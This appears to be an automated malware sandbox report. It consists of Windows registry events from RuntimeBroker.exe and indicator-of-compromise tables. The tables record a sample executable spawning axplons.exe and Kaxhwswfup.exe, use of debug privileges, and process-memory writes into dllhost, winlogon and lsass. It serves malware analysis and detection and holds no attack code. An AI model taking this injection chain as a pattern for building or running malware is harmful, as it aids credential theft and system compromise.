Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894 = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000057e6583957a6da0178a5ba3957a6da0178a5ba3957a6da013f110a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5846bc2000343862633762303665613833323263643661663831643661343530386633333733623962386238313362633939386436613232346365616265313363396639610000b20009000400efbeae5846bcae5846bc2e000000000000000000000000000000000000000000000000009c589300340038006200630037006200300036006500610038003300320032006300640036006100660038003100640036006100340035003000380066003300330037003300620039006200380062003800310033006200630039003900380064003600610032003200340063006500610062006500310033006300390066003900610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000cac0217e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c34386263376230366561383332326364366166383164366134353038663333373362396238623831336263393938643661323234636561626531336339663961000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0f04f0e3dcd03ef118fd7f24b122c28858e69c4ea1508f64e82bc7922d9c9b2b0f04f0e3dcd03ef118fd7f24b122c2885d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5b9a1e40-892d-4bfe = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\48bc7b06ea8322cd6af81d6a4508f3373b9b8b813bc998d6a224ceabe13c9f9a"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687 = 1641ba3957a6da01	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee = b75ec43957a6da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85b342c9-489a-45ce = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = ee4f133957a6da01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7 = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000710e413957a6da01e67f943957a6da01e67f943957a6da01e25606000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5846bc2000646233653261306466616364396334336537363336666564626462343665363566393061376532393064346534306661393766323863653832653335663664640000b20009000400efbeae5846bcae5846bc2e00000000000000000000000000000000000000000000000000736aa600640062003300650032006100300064006600610063006400390063003400330065003700360033003600660065006400620064006200340036006500360035006600390030006100370065003200390030006400340065003400300066006100390037006600320038006300650038003200650033003500660036006400640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000cac0217e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623365326130646661636439633433653736333666656462646234366536356639306137653239306434653430666139376632386365383265333566366464000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0ed4f0e3dcd03ef118fd7f24b122c28858e69c4ea1508f64e82bc7922d9c9b2b0ed4f0e3dcd03ef118fd7f24b122c2885d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e11eeeb7-8ced-457a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c2e94ca6e5e1623f26b6ed0943f5fd3da7d5aa44703003f51decf8a377497ab"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e11eeeb7-8ced-457a = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bbf80a94-1643-4b45 = "8324"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a7fb56a0-d3bf-4b8c = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6c2e94ca6e5e1623f26b6ed0943f5fd3da7d5aa44703003f51decf8a377497ab"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c = "8324"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85b342c9-489a-45ce = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003e0d603957a6da010209bd3957a6da010209bd3957a6da016a220a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ae5846bc2000336362366130316133643836393132363939376135396165633363373732306537326230336637373864613161643633333739376539383666303963616239640000b20009000400efbeae5846bcae5846bc2e000000000000000000000000000000000000000000000000001d318c00330063006200360061003000310061003300640038003600390031003200360039003900370061003500390061006500630033006300370037003200300065003700320062003000330066003700370038006400610031006100640036003300330037003900370065003900380036006600300039006300610062003900640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000cac0217e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33636236613031613364383639313236393937613539616563336337373230653732623033663737386461316164363333373937653938366630396361623964000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726861747165647100000000000000008e69c4ea1508f64e82bc7922d9c9b2b0f14f0e3dcd03ef118fd7f24b122c28858e69c4ea1508f64e82bc7922d9c9b2b0f14f0e3dcd03ef118fd7f24b122c2885d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003900300036003200380037003000320030002d0032003900310035003400370034003600300038002d0031003700350035003600310037003700380037002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000019be7eb9000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\572812a8-5ef2-4894	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fac1525a-0e18-42ee	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5b9a1e40-892d-4bfe	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9d2d30d4-6f50-4cf7	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3b762e73-b0bd-4ea6 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3b762e73-b0bd-4ea6 = "\\\\?\\Volume{B97EBE19-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\db3e2a0dfacd9c43e7636fedbdb46e65f90a7e290d4e40fa97f28ce82e35f6dd"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3b762e73-b0bd-4ea6 = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0eea387b-03eb-4687 = "0"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bbf80a94-1643-4b45	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5147724a-d64c-4c4c	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7bc0db86-e38a-4d17 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeaxplons.exepowershell.EXEdllhost.exeKaxhwswfup.exeWerFault.exesvchost.exe

pid	process
2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe
4292	axplons.exe
4292	axplons.exe
4720	axplons.exe
4720	axplons.exe
4084	powershell.EXE
4084	powershell.EXE
4084	powershell.EXE
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
2856	Kaxhwswfup.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
3212	WerFault.exe
3212	WerFault.exe
4820	dllhost.exe
4820	dllhost.exe
4356	svchost.exe
4356	svchost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe
4820	dllhost.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

Processes:

Kaxhwswfup.exepowershell.EXEdllhost.exedwm.exemousocoreworker.exeRuntimeBroker.exeWerFault.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	2856	Kaxhwswfup.exe
Token: SeDebugPrivilege	4084	powershell.EXE
Token: SeDebugPrivilege	4084	powershell.EXE
Token: SeDebugPrivilege	4820	dllhost.exe
Token: SeShutdownPrivilege	332	dwm.exe
Token: SeCreatePagefilePrivilege	332	dwm.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	3908	RuntimeBroker.exe
Token: SeDebugPrivilege	2856	Kaxhwswfup.exe
Token: SeRestorePrivilege	3212	WerFault.exe
Token: SeBackupPrivilege	3212	WerFault.exe
Token: SeBackupPrivilege	3212	WerFault.exe
Token: SeShutdownPrivilege	3440	Explorer.EXE
Token: SeCreatePagefilePrivilege	3440	Explorer.EXE
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	3908	RuntimeBroker.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	4740	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	4740	mousocoreworker.exe
Token: SeShutdownPrivilege	3908	RuntimeBroker.exe
Token: SeShutdownPrivilege	332	dwm.exe
Token: SeCreatePagefilePrivilege	332	dwm.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3440 Explorer.EXE

pid	process
3440	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exeaxplons.exeKaxhwswfup.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 2156 wrote to memory of 4292	2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	axplons.exe
PID 2156 wrote to memory of 4292	2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	axplons.exe
PID 2156 wrote to memory of 4292	2156	dd069dfe70a747f96f917a19386a9bd9e7fa1021ab84060cfb99ca7e390ddcd4.exe	axplons.exe
PID 4292 wrote to memory of 2856	4292	axplons.exe	Kaxhwswfup.exe
PID 4292 wrote to memory of 2856	4292	axplons.exe	Kaxhwswfup.exe
PID 4292 wrote to memory of 2856	4292	axplons.exe	Kaxhwswfup.exe
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 2856 wrote to memory of 4784	2856	Kaxhwswfup.exe	$77354151
PID 4084 wrote to memory of 4820	4084	powershell.EXE	dllhost.exe
PID 4084 wrote to memory of 4820	4084	powershell.EXE	dllhost.exe
PID 4084 wrote to memory of 4820	4084	powershell.EXE	dllhost.exe
PID 4084 wrote to memory of 4820	4084	powershell.EXE	dllhost.exe
PID 4084 wrote to memory of 4820	4084	powershell.EXE	dllhost.exe
PID 4084 wrote to memory of 4820	4084	powershell.EXE	dllhost.exe
PID 4084 wrote to memory of 4820	4084	powershell.EXE	dllhost.exe
PID 4084 wrote to memory of 4820	4084	powershell.EXE	dllhost.exe
PID 4820 wrote to memory of 624	4820	dllhost.exe	winlogon.exe
PID 4820 wrote to memory of 672	4820	dllhost.exe	lsass.exe
PID 4820 wrote to memory of 960	4820	dllhost.exe	svchost.exe
PID 4820 wrote to memory of 332	4820	dllhost.exe	dwm.exe
PID 4820 wrote to memory of 428	4820	dllhost.exe	svchost.exe
